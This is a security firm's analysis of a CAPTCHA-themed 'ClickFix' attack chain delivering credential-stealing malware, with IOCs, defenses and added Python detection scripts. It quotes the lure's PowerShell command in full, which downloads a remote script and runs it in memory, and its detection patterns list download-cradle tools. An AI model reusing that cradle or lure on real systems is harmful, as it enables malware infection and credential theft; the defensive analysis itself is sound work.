From CAPTCHA to Compromise: New CAPTCHAclipper Cyber Attack Exposed

Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The “CAPTCHAclipper” attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses.

The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a seemingly innocuous CAPTCHA prompt.

This attack, which we’ve dubbed CAPTCHAclipper, exemplifies the convergence of social engineering and technical sophistication to compromise victims’ systems and exfiltrate sensitive data.

We observed the same TTPs in three distinct attacks over the course of one month, all within the European geographical region.

Due to the nature of the attack chain, we suspect a sophisticated threat actor is behind these attacks. However, we cannot provide any attribution at the time of writing. The main payload is probably a variant of LummaC2 malware.

When we first investigated the incident, none of the IOCs we collected were flagged as malicious by the reputation sources we checked, indicating fresh infrastructure and tooling. As of publishing this article, some AV engines recognize at least some of the IOCs, but file hashes and hostnames are trivial for the actor to rotate, so defenders should not rely on them alone.

Below, we discuss different stages of the attack chain.

Analysis of Attack Chain

Stage 1: The Malicious CAPTCHA Lure

The attack began with a phishing lure that directed users to a malicious but legitimate-looking website offering a PDF file for download. Before the file could be downloaded, the victim was presented with an interactive CAPTCHA.

Figure 1 - Legitimate-looking CAPTCHA is presented to victim

This initial step served a dual purpose:

  1. It established a layer of trust by mimicking legitimate verification methods.
  2. It carried out the first technical step of the chain: JavaScript on the page wrote a command to the clipboard, the technique also known as ‘ClickFix’ or ‘paste and run’.

When users engaged with the CAPTCHA to access the promised PDF file, JavaScript on the page silently copied a PowerShell command to the system clipboard, preparing the ground for the next stage:

powershell -WindowStyle Hidden -Command "$rQd='https://s3-scw-tx.b-cdn[.]net/prizev2[.]txt'; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"
Figure 2 - HTML code shows embedded JavaScript that copies malicious command to clipboard

Stage 2: Social Engineering with Malicious Instructions

After completing the CAPTCHA, victims received a notification for verification steps before being able to download the file. In order to download it, the victim had to follow the provided instructions, which were critical to the attack’s success.

  1. Press Win+R to open the Run dialog.
  2. Press CTRL+V to paste the clipboard contents (the victim is unaware that the page has placed a command there).
  3. Press Enter.
Figure 3 - Victim is introduced with fake verification steps to lure them initiating the attack chain

What the victim is told is a verification step is in fact the delivery mechanism. The command:

  • Downloaded a malicious script, prizev2.txt, from a remote server using System.Net.WebClient.DownloadString.
  • Passed the downloaded text straight to Invoke-Expression, so the second stage ran entirely in memory and never existed as a file for file-based detections to scan.

Because it was launched from the Run dialog, powershell.exe appeared as a child of explorer.exe with -WindowStyle Hidden and a download cradle on its command line. That parent-child relationship combined with those flags is rare for legitimate use and is the main detection opportunity at this stage.
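To make that detection opportunity concrete, here is an added Python example (not Conscia's tooling and not the actor's code) that scores process-creation events and Explorer RunMRU registry values for the paste-and-run pattern described above. Field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); the sample events, the RunMRU values and the indicator weights are constructed for illustration.

```python
"""Score process-creation events and RunMRU entries for the ClickFix /
paste-and-run PowerShell pattern. Added example; field names follow Sysmon
Event ID 1 (ParentImage, Image, CommandLine); all sample data is constructed."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# (name, pattern, weight). Short aliases (-w h, iex, iwr) are included because
# lures shorten the clipboard payload so it fits in the Run dialog box.
INDICATORS = [
    ("hidden_window", re.compile(r"-w[a-z]*\s+h(?:idden)?\b", re.I), 2),
    ("download_cradle", re.compile(
        r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|Invoke-WebRequest"
        r"|Invoke-RestMethod|Start-BitsTransfer|\b(?:iwr|irm|curl|wget)\b", re.I), 2),
    ("in_memory_exec", re.compile(
        r"Invoke-Expression|\biex\b|\[scriptblock\]::create"
        r"|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I), 3),
    ("remote_url", re.compile(r"https?://", re.I), 1),
    ("policy_bypass", re.compile(
        r"-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1),
]
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
THRESHOLD = 6            # a plain explorer->powershell launch alone stays below this
RUN_DIALOG_WEIGHT = 3    # Win+R children are spawned by explorer.exe


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command(cmd: str):
    """Return (list of indicator names hit, summed weight) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return hits, score


def detect(ev: ProcessEvent):
    """Return {'score', 'hits'} when the event looks like paste-and-run, else None."""
    if basename(ev.image) not in SHELLS:
        return None
    hits, score = score_command(ev.command_line)
    if basename(ev.parent_image) == "explorer.exe":
        hits.append("launched_from_explorer")
        score += RUN_DIALOG_WEIGHT
    return {"score": score, "hits": hits} if score >= THRESHOLD else None


def runmru_hits(values: dict):
    """values = {valueName: data} exported from
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
    Each entry ends with the literal suffix '\\1'; MRUList holds the ordering.
    Anything typed into the Run dialog already implies explorer.exe as parent."""
    findings = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        hits, score = score_command(cmd)
        if score + RUN_DIALOG_WEIGHT >= THRESHOLD:
            findings.append((name, cmd, hits))
    return findings


# Constructed samples. LURE is the command line from this write-up (URL kept defanged).
LURE = ("powershell -WindowStyle Hidden -Command \"$rQd='https://s3-scw-tx.b-cdn[.]net/prizev2[.]txt'; "
        "$pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;\"")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS, LURE),                       # the attack
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe"),           # user opened a console
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS,
                 r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),  # scheduled admin script
]
RUNMRU = {"a": LURE + "\\1", "b": "notepad\\1", "MRUList": "ab"}

if __name__ == "__main__":
    for ev in EVENTS:
        print(basename(ev.parent_image), "->", basename(ev.image), detect(ev))
    for name, cmd, hits in runmru_hits(RUNMRU):
        print("RunMRU", name, hits, cmd[:60])
```

The weights are deliberately additive rather than a single regex: a lone hidden-window flag or a lone explorer parent is common enough to be noise, while their combination with a download cradle and Invoke-Expression is what characterizes this chain. The RunMRU check is the forensic counterpart for hosts without process telemetry, since the Run dialog records what was pasted.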

Stage 3: Deployment of Malicious Payload

The downloaded script carried out multiple tasks to prepare for the next stage:

  1. Retrieved a ZIP file (prize.zip) from https://fixedzip.oss-ap-southeast-5.aliyuncs[.]com.
  2. Extracted the ZIP file contents into a randomly named folder within the APPDATA directory.
  3. Launched the extracted executable setup.exe, initiating the attack’s next phase.
Figure 4 - the main payload is dropped as Setup.exe in APPDATA directory

Extracting into a randomly named folder under APPDATA gave the actor a user-writable location that requires no elevation and blends in with legitimate application data, while the random folder name prevents a simple path-based indicator from being shared between victims.

Stage 4: Malicious Activities of Setup.exe

The executable Setup.exe was a potent tool designed for both immediate impact and long-term persistence. Its TTPs included:

  • Credential Theft: Extracting login credentials from the browsers’ Login Data stores at their default profile locations.
  • Reconnaissance: Enumerating installed antivirus and endpoint protection software to evade detection or disable defenses.
  • Command-and-Control (C2) Communication: Establishing an outbound connection to 104.21.4.107:443, linked to the domain sliperyedhby[.]icu. This connection facilitated data exfiltration and allowed further commands from the attacker. Note that 104.21.4.107 falls within Cloudflare’s 104.16.0.0/13 range, so the domain rather than the IP address is the indicator to act on.
  • Persistence Mechanisms: Registering a scheduled task for automatic execution after system reboots, and creating an additional file (69HT8K.pif), potentially a decoy or a secondary stage. Windows runs .pif files as executables, so the extension should not be treated as benign.

Indicators of Compromise (IOCs)

File Artifacts

Setup.exe (SHA-256):
  • d19f31a0c9926824ed9554b254804ab805c8d2d5bc68b4b129e7ef520a673feb
  • 8ce1cde3bd1fa945af8e03459775a87dba7275c17401ab19e525b3238609f6b
AutoIt3.exe (SHA-256):
  • 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48

Networking Artifacts
Domains and URLs:
  • https://s3-scw-tx.b-cdn[.]net
  • https://fixedzip.oss-ap-southeast-5.aliyuncs[.]com
  • https://dirverif.oss-ap-southeast-5.aliyuncs[.]com/checkpoint/finished/gnerous.txt
  • sliperyedhby[.]icu
IP Address:
  • 104.21.4.107 (Cloudflare range; low confidence on its own, use together with the domain)
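To turn the list above into something a SOC can run against proxy or DNS logs, here is an added Python example (not part of Conscia’s analysis). It refangs the indicators, matches hosts and their subdomains, and downgrades the bare IP match because 104.21.4.107 sits in Cloudflare’s 104.16.0.0/13, which is shared with many unrelated sites. The access-log lines are constructed for this example.

```python
"""Refang the IOCs from this write-up and match them against proxy log lines.
Added example, not part of the original analysis; log lines are constructed."""
import ipaddress
import re
from urllib.parse import urlsplit

IOC_RAW = [
    "https://s3-scw-tx.b-cdn[.]net/prizev2[.]txt",
    "https://fixedzip.oss-ap-southeast-5.aliyuncs[.]com",
    "https://dirverif.oss-ap-southeast-5.aliyuncs[.]com/checkpoint/finished/gnerous.txt",
    "sliperyedhby[.]icu",
    "104.21.4.107",
]
# Ranges of shared CDN / reverse-proxy providers: an IP hit here is shared with
# unrelated tenants and is only a weak signal. Cloudflare's 104.16.0.0/13 covers
# the C2 address above; extend this list for your environment.
SHARED_CDN_RANGES = [ipaddress.ip_network("104.16.0.0/13")]


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def ioc_host(ioc: str) -> str:
    ioc = refang(ioc)
    if "://" not in ioc:
        ioc = "//" + ioc          # lets urlsplit treat a bare host as the netloc
    return urlsplit(ioc).hostname.lower()


def build_matcher(raw_iocs):
    """Split IOCs into a set of domains and a {ip: confidence} map."""
    domains, ips = set(), {}
    for ioc in raw_iocs:
        host = ioc_host(ioc)
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            domains.add(host)
            continue
        ips[host] = "low" if any(addr in net for net in SHARED_CDN_RANGES) else "high"
    return domains, ips


def host_matches(host: str, domains) -> bool:
    """Exact or subdomain match against the IOC domains."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


# Constructed access-log format: time client method url status
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def scan_proxy_log(lines, domains, ips):
    """Return (client, host, kind, confidence) for every line that touches an IOC."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m["url"]
        host = urlsplit(url if "://" in url else "//" + url).hostname  # CONNECT lines are host:port
        if not host:
            continue
        if host_matches(host, domains):
            findings.append((m["client"], host, "domain", "high"))
        elif host in ips:
            findings.append((m["client"], host, "ip", ips[host]))
    return findings


PROXY_LOG = [  # constructed sample lines
    "2024-01-01T09:14:03Z 10.0.5.23 GET https://s3-scw-tx.b-cdn.net/prizev2.txt 200",
    "2024-01-01T09:14:05Z 10.0.5.23 CONNECT fixedzip.oss-ap-southeast-5.aliyuncs.com:443 200",
    "2024-01-01T09:14:30Z 10.0.5.23 CONNECT sliperyedhby.icu:443 200",
    "2024-01-01T09:15:00Z 10.0.7.9 CONNECT 104.21.4.107:443 200",
    "2024-01-01T09:15:02Z 10.0.7.9 GET https://www.example.com/index.html 200",
]

if __name__ == "__main__":
    doms, ip_conf = build_matcher(IOC_RAW)
    for hit in scan_proxy_log(PROXY_LOG, doms, ip_conf):
        print(hit)
```

Matching on the domain set is what you want to block and alert on; the IP match is kept, but tagged low confidence, because blocking 104.21.4.107 would also block every other Cloudflare-fronted site that happens to resolve to that edge address.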

Implications and Lessons Learned

The CAPTCHAclipper attack highlights a sophisticated, multi-layered approach to compromising systems:

  • User Interaction as an Attack Vector: The reliance on user-driven actions (copy-pasting commands) exemplifies the effectiveness of social engineering.
  • Memory-Based Execution: Executing payloads in memory minimized detection by traditional antivirus solutions.
  • Persistence and Exfiltration: Establishing persistence ensured long-term access, while C2 communication enabled data theft and remote control.

Effective defense strategies

The CAPTCHAclipper attack is a reminder of the evolving tactics employed by cyber adversaries. Its blend of technical ingenuity and psychological manipulation demonstrates the importance of proactive defense strategies. By leveraging social engineering and multi-stage infection techniques, attackers effectively bypass traditional defenses and exploit user trust.

To defend against such sophisticated threats, Conscia SOC recommends that organizations adopt a multi-faceted cybersecurity approach: 

  1. User Awareness Training: Conduct regular training sessions to help employees recognize phishing and other social engineering techniques.
  2. Enable Endpoint Detection and Response (EDR): Deploy solutions that can identify and mitigate fileless malware and suspicious PowerShell activity.
  3. Employ continuous monitoring of security events: Deploying security solutions is not enough if no analyst reviews the alerts they generate. Timely detection is crucial in these attacks because, once the victim presses Enter, the rest of the chain runs automatically.
  4. Restrict and log PowerShell: Note that an AllSigned execution policy only governs .ps1 script files and does not stop this attack, which passes the downloaded text to Invoke-Expression via -Command and never runs a script file. Constrain PowerShell with AppLocker or WDAC (which also places it in Constrained Language Mode), enable Script Block Logging (Event ID 4104) so the content of prizev2.txt is recorded when it executes, and alert on powershell.exe spawned by explorer.exe with -WindowStyle Hidden and a download cradle. Where users do not need the Run dialog, the NoRun Explorer policy removes it and the Win+R shortcut.
  5. Network Monitoring and Data Leak Detection: Implement network monitoring tools to detect unusual outbound connections to C2 servers or unauthorized data exfiltration.
  6. Incident Response Planning: Ensure your team is prepared to respond to multi-stage infections with a clear remediation strategy.

In addition to that, we also encourage all cybersecurity professionals to actively participate in the cybersecurity community. You can: 

  • Collaborate and Share Intelligence: Share insights and indicators of compromise (IOCs) with trusted communities to help combat similar threats.
  • Report and Investigate: If you detect similar activity, report it to your threat intelligence providers or national cybersecurity bodies to track emerging trends.
  • Enhance Threat Hunting: Leverage this analysis as a use case to improve threat-hunting capabilities within your organization.
